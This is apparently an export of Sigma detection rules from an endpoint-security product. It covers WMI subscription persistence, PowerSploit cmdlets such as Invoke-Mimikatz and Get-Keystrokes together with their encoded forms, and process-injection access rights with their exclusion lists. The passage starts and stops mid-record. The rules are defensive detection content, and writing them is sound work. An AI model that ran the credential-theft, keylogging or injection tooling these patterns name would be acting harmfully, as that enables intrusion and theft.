"rule_description": "Detects the creation or modification of a suspicious WMI binding using a dangerous consumer.\nAdversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\nBy default, two consumer classes can be used maliciously:\n - ActiveScriptEventConsumer: executes the specified code or related script;\n - CommandLineEventConsumer: executes the specified command line.\n\nThe consumer and filter parameters should be investigated to determine their legitimacy, for example using the PowerShell cmdlet Get-WmiObject.\n",
"rule_creation_date": "2023-12-07",
"rule_modified_date": "2025-11-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ca528e6b-b852-41f1-b94c-82363027fb31",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595564Z",
"creation_date": "2026-03-23T11:45:34.595567Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595575Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/PowerShellMafia/PowerSploit",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0194/"
],
"name": "t1059_001_powershell_malicious_cmdlet_powersploit_cmd.yml",
"content": "title: Malicious PowerSploit Commandlets in Command-line\nid: ca528e6b-b852-41f1-b94c-82363027fb31\ndescription: |\n Detects various malicious cmdlets in PowerShell's command-line, generally associated with the PowerSploit framework.\n PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\n It is recommended to investigate actions performed by attackers using the PowerSploit framework and to isolate infected systems.\nreferences:\n - https://github.com/PowerShellMafia/PowerSploit\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0194/\ndate: 2021/06/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1134\n - attack.collection\n - attack.credential_access\n - attack.t1056.001\n - attack.execution\n - attack.t1047\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.005\n - attack.s0194\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerSploit\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmdlet:\n CommandLine|contains:\n # Set-MacAttribute, from PowerSploit\n - 'Set-MacAttribute'\n - 'UwBlAHQALQBNAGEAYwBBAHQAdAByAGkAYgB1AHQAZQ'\n - 'MAZQB0AC0ATQBhAGMAQQB0AHQAcgBpAGIAdQB0AGUA'\n - 'TAGUAdAAtAE0AYQBjAEEAdAB0AHIAaQBiAHUAdABlA'\n # Invoke-DllInjection, from PowerSploit\n - 'Invoke-DllInjection'\n - 'SQBuAHYAbwBrAGUALQBEAGwAbABJAG4AagBlAGMAdABpAG8Abg'\n - 'kAbgB2AG8AawBlAC0ARABsAGwASQBuAGoAZQBjAHQAaQBvAG4A'\n - 'JAG4AdgBvAGsAZQAtAEQAbABsAEkAbgBqAGUAYwB0AGkAbwBuA'\n # Invoke-Shellcode, from PowerSploit\n - 'Invoke-Shellcode'\n - 'SQBuAHYAbwBrAGUALQBTAGgAZQBsAGwAYwBvAGQAZQ'\n - 'kAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUA'\n - 
'JAG4AdgBvAGsAZQAtAFMAaABlAGwAbABjAG8AZABlA'\n # Invoke-WmiCommand, from PowerSploit\n - 'Invoke-WmiCommand'\n - 'SQBuAHYAbwBrAGUALQBXAG0AaQBDAG8AbQBtAGEAbgBkA'\n - 'kAbgB2AG8AawBlAC0AVwBtAGkAQwBvAG0AbQBhAG4AZA'\n - 'JAG4AdgBvAGsAZQAtAFcAbQBpAEMAbwBtAG0AYQBuAGQA'\n # Get-GPPPassword, from PowerSploit\n - 'Get-GPPPassword'\n - 'RwBlAHQALQBHAFAAUABQAGEAcwBzAHcAbwByAGQA'\n - 'cAZQB0AC0ARwBQAFAAUABhAHMAcwB3AG8AcgBkA'\n - 'HAGUAdAAtAEcAUABQAFAAYQBzAHMAdwBvAHIAZA'\n # Get-Keystrokes, from PowerSploit\n - 'Get-Keystrokes'\n - 'RwBlAHQALQBLAGUAeQBzAHQAcgBvAGsAZQBzA'\n - 'cAZQB0AC0ASwBlAHkAcwB0AHIAbwBrAGUAcw'\n - 'HAGUAdAAtAEsAZQB5AHMAdAByAG8AawBlAHMA'\n # Get-TimedScreenshot, from PowerSploit\n - 'Get-TimedScreenshot'\n - 'RwBlAHQALQBUAGkAbQBlAGQAUwBjAHIAZQBlAG4AcwBoAG8AdA'\n - 'cAZQB0AC0AVABpAG0AZQBkAFMAYwByAGUAZQBuAHMAaABvAHQA'\n - 'HAGUAdAAtAFQAaQBtAGUAZABTAGMAcgBlAGUAbgBzAGgAbwB0A'\n # Get-VaultCredential, from PowerSploit\n - 'Get-VaultCredential'\n - 'RwBlAHQALQBWAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbA'\n - 'cAZQB0AC0AVgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwA'\n - 'HAGUAdAAtAFYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsA'\n # Invoke-CredentialInjection, from PowerSploit\n - 'Invoke-CredentialInjection'\n - 'SQBuAHYAbwBrAGUALQBDAHIAZQBkAGUAbgB0AGkAYQBsAEkAbgBqAGUAYwB0AGkAbwBuA'\n - 'kAbgB2AG8AawBlAC0AQwByAGUAZABlAG4AdABpAGEAbABJAG4AagBlAGMAdABpAG8Abg'\n - 'JAG4AdgBvAGsAZQAtAEMAcgBlAGQAZQBuAHQAaQBhAGwASQBuAGoAZQBjAHQAaQBvAG4A'\n # Invoke-Mimikatz, from PowerSploit\n - 'Invoke-Mimikatz'\n - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA'\n - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A'\n - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg'\n # Invoke-NinjaCopy, from PowerSploit\n - 'Invoke-NinjaCopy'\n - 'SQBuAHYAbwBrAGUALQBOAGkAbgBqAGEAQwBvAHAAeQ'\n - 'kAbgB2AG8AawBlAC0ATgBpAG4AagBhAEMAbwBwAHkA'\n - 'JAG4AdgBvAGsAZQAtAE4AaQBuAGoAYQBDAG8AcAB5A'\n # Invoke-TokenManipulation, from PowerSploit\n - 'Invoke-TokenManipulation'\n - 'SQBuAHYAbwBrAGUALQBUAG8AawBlAG4ATQBhAG4AaQBwAHUAbABhAHQAaQBvAG4A'\n - 
'kAbgB2AG8AawBlAC0AVABvAGsAZQBuAE0AYQBuAGkAcAB1AGwAYQB0AGkAbwBuA'\n - 'JAG4AdgBvAGsAZQAtAFQAbwBrAGUAbgBNAGEAbgBpAHAAdQBsAGEAdABpAG8Abg'\n # Out-Minidump, from PowerSploit\n - 'Out-Minidump'\n - 'TwB1AHQALQBNAGkAbgBpAGQAdQBtAHAA'\n - '8AdQB0AC0ATQBpAG4AaQBkAHUAbQBwA'\n - 'PAHUAdAAtAE0AaQBuAGkAZAB1AG0AcA'\n # Invoke-ReflectivePEInjection, from PowerSploit\n - 'Invoke-ReflectivePEInjection'\n - 'SQBuAHYAbwBrAGUALQBSAGUAZgBsAGUAYwB0AGkAdgBlAFAARQBJAG4AagBlAGMAdABpAG8Abg'\n - 'kAbgB2AG8AawBlAC0AUgBlAGYAbABlAGMAdABpAHYAZQBQAEUASQBuAGoAZQBjAHQAaQBvAG4A'\n - 'JAG4AdgBvAGsAZQAtAFIAZQBmAGwAZQBjAHQAaQB2AGUAUABFAEkAbgBqAGUAYwB0AGkAbwBuA'\n # Invoke-UserHunter, from PowerSploit\n - 'Invoke-UserHunter'\n - 'SQBuAHYAbwBrAGUALQBVAHMAZQByAEgAdQBuAHQAZQByA'\n - 'kAbgB2AG8AawBlAC0AVQBzAGUAcgBIAHUAbgB0AGUAcg'\n - 'JAG4AdgBvAGsAZQAtAFUAcwBlAHIASAB1AG4AdABlAHIA'\n # Find-GPOLocation, from PowerSploit\n - 'Find-GPOLocation'\n - 'RgBpAG4AZAAtAEcAUABPAEwAbwBjAGEAdABpAG8Abg'\n - 'YAaQBuAGQALQBHAFAATwBMAG8AYwBhAHQAaQBvAG4A'\n - 'GAGkAbgBkAC0ARwBQAE8ATABvAGMAYQB0AGkAbwBuA'\n # Invoke-ACLScanner, from PowerSploit\n - 'Invoke-ACLScanner'\n - 'SQBuAHYAbwBrAGUALQBBAEMATABTAGMAYQBuAG4AZQByA'\n - 'kAbgB2AG8AawBlAC0AQQBDAEwAUwBjAGEAbgBuAGUAcg'\n - 'JAG4AdgBvAGsAZQAtAEEAQwBMAFMAYwBhAG4AbgBlAHIA'\n # Invoke-DowngradeAccount, from PowerSploit\n - 'Invoke-DowngradeAccount'\n - 'SQBuAHYAbwBrAGUALQBEAG8AdwBuAGcAcgBhAGQAZQBBAGMAYwBvAHUAbgB0A'\n - 'kAbgB2AG8AawBlAC0ARABvAHcAbgBnAHIAYQBkAGUAQQBjAGMAbwB1AG4AdA'\n - 'JAG4AdgBvAGsAZQAtAEQAbwB3AG4AZwByAGEAZABlAEEAYwBjAG8AdQBuAHQA'\n # Invoke-ServiceAbuse, from PowerSploit\n - 'Invoke-ServiceAbuse'\n - 'SQBuAHYAbwBrAGUALQBTAGUAcgB2AGkAYwBlAEEAYgB1AHMAZQ'\n - 'kAbgB2AG8AawBlAC0AUwBlAHIAdgBpAGMAZQBBAGIAdQBzAGUA'\n - 'JAG4AdgBvAGsAZQAtAFMAZQByAHYAaQBjAGUAQQBiAHUAcwBlA'\n # Install-SSP, from PowerSploit\n - 'Install-SSP'\n - 'SQBuAHMAdABhAGwAbAAtAFMAUwBQA'\n - 'kAbgBzAHQAYQBsAGwALQBTAFMAUA'\n - 'JAG4AcwB0AGEAbABsAC0AUwBTAFAA'\n # PowerBreach, from PowerSploit\n - 
'PowerBreach'\n - 'UABvAHcAZQByAEIAcgBlAGEAYwBoA'\n - 'AAbwB3AGUAcgBCAHIAZQBhAGMAaA'\n - 'QAG8AdwBlAHIAQgByAGUAYQBjAGgA'\n # Get-SiteListPassword, from PowerSploit\n - 'Get-SiteListPassword'\n - 'RwBlAHQALQBTAGkAdABlAEwAaQBzAHQAUABhAHMAcwB3AG8AcgBkA'\n - 'cAZQB0AC0AUwBpAHQAZQBMAGkAcwB0AFAAYQBzAHMAdwBvAHIAZA'\n - 'HAGUAdAAtAFMAaQB0AGUATABpAHMAdABQAGEAcwBzAHcAbwByAGQA'\n # Invoke-WScriptBypass, from PowerSploit\n - 'Invoke-WScriptBypassUAC'\n - 'SQBuAHYAbwBrAGUALQBXAFMAYwByAGkAcAB0AEIAeQBwAGEAcwBzAFUAQQBDA'\n - 'kAbgB2AG8AawBlAC0AVwBTAGMAcgBpAHAAdABCAHkAcABhAHMAcwBVAEEAQw'\n - 'JAG4AdgBvAGsAZQAtAFcAUwBjAHIAaQBwAHQAQgB5AHAAYQBzAHMAVQBBAEMA'\n # Powerup, from PowerSploit\n - 'PowerUp'\n - 'UABvAHcAZQByAFUAcA'\n - 'AAbwB3AGUAcgBVAHAA'\n - 'QAG8AdwBlAHIAVQBwA'\n - 'Get-ServiceUnquoted'\n - 'RwBlAHQALQBTAGUAcgB2AGkAYwBlAFUAbgBxAHUAbwB0AGUAZA'\n - 'cAZQB0AC0AUwBlAHIAdgBpAGMAZQBVAG4AcQB1AG8AdABlAGQA'\n - 'HAGUAdAAtAFMAZQByAHYAaQBjAGUAVQBuAHEAdQBvAHQAZQBkA'\n - 'Get-ServiceFilePermission'\n - 'R2V0LVNlcnZpY2VGaWxlUGVybWlzc2lvb'\n - 'dldC1TZXJ2aWNlRmlsZVBlcm1pc3Npb2'\n - 'HZXQtU2VydmljZUZpbGVQZXJtaXNzaW9u'\n - 'Get-ServicePermission'\n - 'R2V0LVNlcnZpY2VQZXJtaXNzaW9u'\n - 'dldC1TZXJ2aWNlUGVybWlzc2lvb'\n - 'HZXQtU2VydmljZVBlcm1pc3Npb2'\n - 'Install-ServiceBinary'\n - 'SW5zdGFsbC1TZXJ2aWNlQmluYXJ5'\n - 'luc3RhbGwtU2VydmljZUJpbmFye'\n - 'JbnN0YWxsLVNlcnZpY2VCaW5hcn'\n - 'Find-DLLHijack'\n - 'RgBpAG4AZAAtAEQATABMAEgAaQBqAGEAYwBrA'\n - 'YAaQBuAGQALQBEAEwATABIAGkAagBhAGMAaw'\n - 'GAGkAbgBkAC0ARABMAEwASABpAGoAYQBjAGsA'\n - 'Find-PathHijack'\n - 'RgBpAG4AZAAtAFAAYQB0AGgASABpAGoAYQBjAGsA'\n - 'YAaQBuAGQALQBQAGEAdABoAEgAaQBqAGEAYwBrA'\n - 'GAGkAbgBkAC0AUABhAHQAaABIAGkAagBhAGMAaw'\n - 'Get-RegAlwaysInstallElevated'\n - 'RwBlAHQALQBSAGUAZwBBAGwAdwBhAHkAcwBJAG4AcwB0AGEAbABsAEUAbABlAHYAYQB0AGUAZA'\n - 'cAZQB0AC0AUgBlAGcAQQBsAHcAYQB5AHMASQBuAHMAdABhAGwAbABFAGwAZQB2AGEAdABlAGQA'\n - 'HAGUAdAAtAFIAZQBnAEEAbAB3AGEAeQBzAEkAbgBzAHQAYQBsAGwARQBsAGUAdgBhAHQAZQBkA'\n - 'Get-RegAutoLogon'\n - 
'RwBlAHQALQBSAGUAZwBBAHUAdABvAEwAbwBnAG8Abg'\n - 'cAZQB0AC0AUgBlAGcAQQB1AHQAbwBMAG8AZwBvAG4A'\n - 'HAGUAdAAtAFIAZQBnAEEAdQB0AG8ATABvAGcAbwBuA'\n - 'Get-VulnAutoRun'\n - 'RwBlAHQALQBWAHUAbABuAEEAdQB0AG8AUgB1AG4A'\n - 'cAZQB0AC0AVgB1AGwAbgBBAHUAdABvAFIAdQBuA'\n - 'HAGUAdAAtAFYAdQBsAG4AQQB1AHQAbwBSAHUAbg'\n - 'Get-VulnSchTask'\n - 'RwBlAHQALQBWAHUAbABuAFMAYwBoAFQAYQBzAGsA'\n - 'cAZQB0AC0AVgB1AGwAbgBTAGMAaABUAGEAcwBrA'\n - 'HAGUAdAAtAFYAdQBsAG4AUwBjAGgAVABhAHMAaw'\n # PowerView, from PowerSploit\n - 'PowerView'\n - 'UABvAHcAZQByAFYAaQBlAHcA'\n - 'AAbwB3AGUAcgBWAGkAZQB3A'\n - 'QAG8AdwBlAHIAVgBpAGUAdw'\n # Invoke-PortScan, from PowerSploit\n - 'Invoke-PortScan'\n - 'SQBuAHYAbwBrAGUALQBQAG8AcgB0AFMAYwBhAG4A'\n - 'kAbgB2AG8AawBlAC0AUABvAHIAdABTAGMAYQBuA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwByAHQAUwBjAGEAbg'\n # Invoke-ReverseDNSLookup, from PowerSploit\n - 'Invoke-ReverseDNSLookup'\n - 'SQBuAHYAbwBrAGUALQBSAGUAdgBlAHIAcwBlAEQATgBTAEwAbwBvAGsAdQBwA'\n - 'kAbgB2AG8AawBlAC0AUgBlAHYAZQByAHMAZQBEAE4AUwBMAG8AbwBrAHUAcA'\n - 'JAG4AdgBvAGsAZQAtAFIAZQB2AGUAcgBzAGUARABOAFMATABvAG8AawB1AHAA'\n # Invoke-AllChecks, from PowerSploit\n - 'Invoke-AllChecks'\n - 'SQBuAHYAbwBrAGUALQBBAGwAbABDAGgAZQBjAGsAcw'\n - 'kAbgB2AG8AawBlAC0AQQBsAGwAQwBoAGUAYwBrAHMA'\n - 'JAG4AdgBvAGsAZQAtAEEAbABsAEMAaABlAGMAawBzA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ca528e6b-b852-41f1-b94c-82363027fb31",
"rule_name": "Malicious PowerSploit Commandlets in Command-line",
"rule_description": "Detects various malicious cmdlets in PowerShell's command-line, generally associated with the PowerSploit framework.\nPowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\nIt is recommended to investigate actions performed by attackers using the PowerSploit framework and to isolate infected systems.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1056.001",
"attack.t1059.001",
"attack.t1134",
"attack.t1547.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ca8123d8-d3c1-440a-985e-ecc31c2b39b8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076586Z",
"creation_date": "2026-03-23T11:45:34.076588Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076592Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_cobalt_process_access.yml",
"content": "title: Possible Process Injection from Unknown Module Detected\nid: ca8123d8-d3c1-440a-985e-ecc31c2b39b8\ndescription: |\n Detects an attempt to open a process with specific permissions associated with code injection, from an unknown module.\n These specific permissions allow an attacker to remotely write a shellcode and create a remote thread pointing to it.\n It is recommended to investigate the source process for suspicious activities.\n It is also recommended to check for injected threads in the target process.\nreferences:\n - https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2021/06/11\nmodified: 2025/04/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.s0154\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n # PROCESS_QUERY_LIMITED_INFORMATION\n # PROCESS_QUERY_INFORMATION\n # PROCESS_VM_WRITE\n # PROCESS_VM_READ\n # PROCESS_VM_OPERATION\n # PROCESS_CREATE_THREAD\n GrantedAccess: '0x143a'\n CallTrace|endswith: '|UNKNOWN(????????????????)'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_vs_code:\n ProcessOriginalFileName: 'electron.exe'\n ProcessInternalName: 'electron.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_vs_codium:\n ProcessOriginalFileName: 'electron.exe'\n ProcessInternalName: 'electron.exe'\n ProcessDescription: 'VSCodium'\n ProcessImage: '*\\VSCodium.exe' # C:\\Users\\xxxxx\\AppData\\Local\\Programs\\VSCodium\\VSCodium.exe / C:\\Users\\xxxx\\Documents\\Logiciels\\VSCodium-win32-x64-1.62.3\\VSCodium.exe\n\n 
exclusion_kaspersky:\n ProcessProcessName:\n - 'avp.exe'\n - 'ksde.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Kaspersky Lab'\n - 'Kaspersky Lab JSC'\n\n exclusion_vmware:\n # C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\n ProcessProcessName: 'vmtoolsd.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'VMware, Inc.'\n\n exclusion_azuredatastudio:\n # C:\\Program Files\\Azure Data Studio\\azuredatastudio.exe\n ProcessProcessName: 'azuredatastudio.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_riot_games_vanguard:\n # C:\\Program Files\\Riot Vanguard\\vgc.exe\n ProcessProcessName:\n - 'vgc.exe'\n - 'vgm.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Riot Games, Inc.'\n\n exclusion_winzip:\n ProcessProcessName: 'FAHWindow64.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'WinZip Computing LLC'\n - 'WinZip Computing, S.L.'\n - 'Corel Corporation'\n\n exclusion_uipath:\n ProcessOriginalFileName:\n - 'UiExplorer.exe'\n - 'UiPath.Executor.exe'\n - 'UiPath.Executor.dll'\n - 'UiPath.Studio.Project.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'UiPath, Inc.'\n\n exclusion_git:\n ProcessParentImage:\n - '?:\\Program Files\\Git\\usr\\bin\\bash.exe'\n - '*\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n - '?:\\Program Files\\Git\\usr\\bin\\sh.exe'\n - '*\\AppData\\Local\\Programs\\Git\\usr\\bin\\sh.exe'\n\n exclusion_zoomtext:\n # C:\\Program Files (x86)\\Freedom Scientific\\ZoomText\\2019\\AiSquared.Magnification.ZoomText.exe\n ProcessOriginalFileName: 'AiSquared.Magnification.ZoomText.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Freedom Scientific Inc'\n\n exclusion_equ8_anticheat:\n ProcessOriginalFileName: 'anticheat.x??.equ8.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Int3 Software AB'\n\n exclusion_bitdefender_injection_64:\n # Ivanti seems to bundle BitDefender DLLs...\n CallTrace|startswith:\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint 
Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(0000????????????)'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(0000????????????)'\n exclusion_bitdefender_injection_32:\n CallTrace|contains:\n - '|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(000000007???????)|'\n - '|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(00000000f???????)|'\n - '|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(000000007???????)|'\n - 
'|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(00000000f???????)|'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(000000007???????)|'\n\n exclusion_cursor:\n ProcessName: 'Cursor.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Todesktop Limited'\n - 'Anysphere, Inc.'\n\n exclusion_adinsight:\n ProcessDescription: 'Active directory LDAP monitor'\n ProcessInternalName: 'ADInsight'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_netwrix:\n ProcessImage: '?:\\Windows\\Netwrix Auditor\\Netwrix Auditor Mailbox Access Core Service\\NombaAgent64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Netwrix Corporation'\n\n exclusion_cygwin:\n ProcessImage|contains:\n - '\\cygwin64\\bin\\'\n - '\\cygwin\\bin\\'\n - '\\cygwin\\usr\\sbin\\'\n - '\\cygwin1\\root\\bin\\'\n TargetImage|contains:\n - '\\cygwin64\\bin\\'\n - '\\cygwin\\bin\\'\n - '\\cygwin\\usr\\sbin\\'\n - '\\cygwin1\\root\\bin\\'\n\n exclusion_px4:\n TargetImage: '?:\\PX4\\toolchain\\cygwin64\\bin\\bash.exe'\n ProcessImage: '?:\\PX4\\home\\Firmware\\build\\px4_sitl_default\\bin\\px4.exe'\n\n exclusion_msys2:\n CallTrace|contains: '\\usr\\bin\\msys-2.0.dll+'\n\n exclusion_mcafee:\n CallTrace|endswith:\n - '|?:\\Program Files\\McAfee\\DLP\\Agent\\fcacafa64.dll+???|UNKNOWN(????????????????)'\n - '|?:\\Program Files\\McAfee\\DLP\\Agent\\fcacafa64.dll+????|UNKNOWN(????????????????)'\n - 
'|?:\\Program Files\\McAfee\\DLP\\Agent\\fcacafa64.dll+?????|UNKNOWN(????????????????)'\n\n exclusion_mojo:\n TargetProcessCommandLine|contains|all:\n - '--service-worker-schemes=vscode-webview'\n - '--mojo-platform-channel-handle='\n - '/prefetch:'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ca8123d8-d3c1-440a-985e-ecc31c2b39b8",
"rule_name": "Possible Process Injection from Unknown Module Detected",
"rule_description": "Detects an attempt to open a process with specific permissions associated with code injection, from an unknown module.\nThese specific permissions allow an attacker to remotely write a shellcode and create a remote thread pointing to it.\nIt is recommended to investigate the source process for suspicious activities.\nIt is also recommended to check for injected threads in the target process.\n",
"rule_creation_date": "2021-06-11",
"rule_modified_date": "2025-04-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ca8c50c9-be31-44c0-a2ca-c493faf68069",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
